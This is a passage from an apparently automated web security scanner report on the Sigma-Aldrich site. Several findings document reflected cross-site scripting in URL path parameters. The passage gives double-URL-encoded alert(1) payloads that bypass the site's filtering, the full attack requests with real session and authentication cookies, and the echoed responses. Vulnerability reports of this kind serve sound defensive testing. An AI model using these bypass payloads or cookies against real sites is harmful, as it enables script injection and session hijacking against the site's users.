Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:10 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc155f6";alert(1)//e68f3e92fba/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.292. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7dc%2522%253balert%25281%2529%252f%252f80d9c49c2e9 was submitted in the REST URL parameter 2. This input was echoed as ad7dc";alert(1)//80d9c49c2e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibad7dc%2522%253balert%25281%2529%252f%252f80d9c49c2e9/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibad7dc";alert(1)//80d9c49c2e9/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.293. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3ad%2522%253balert%25281%2529%252f%252f038547d0233 was submitted in the REST URL parameter 3. This input was echoed as 8d3ad";alert(1)//038547d0233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs8d3ad%2522%253balert%25281%2529%252f%252f038547d0233/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:20 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs8d3ad";alert(1)//038547d0233/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.294. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac18%2522%253balert%25281%2529%252f%252f90ea998edb5 was submitted in the REST URL parameter 4. This input was echoed as 3ac18";alert(1)//90ea998edb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma3ac18%2522%253balert%25281%2529%252f%252f90ea998edb5/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:26 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma3ac18";alert(1)//90ea998edb5/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.295. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eea2%2522%253balert%25281%2529%252f%252ffd80cad0ff9 was submitted in the REST URL parameter 5. This input was echoed as 2eea2";alert(1)//fd80cad0ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/Bulletin2eea2%2522%253balert%25281%2529%252f%252ffd80cad0ff9/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/Bulletin2eea2";alert(1)//fd80cad0ff9/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf","E404") ;
   </script>
...[SNIP]...

1.296. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/Bulletin/pp0100bul.Par.0001.File.tmp/pp0100bul.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ba81%2522%253balert%25281%2529%252f%252fecdfc01212 was submitted in the REST URL parameter 6. This input was echoed as 2ba81";alert(1)//ecdfc01212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/Bulletin/2ba81%2522%253balert%25281%2529%252f%252fecdfc01212/pp0100bul.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
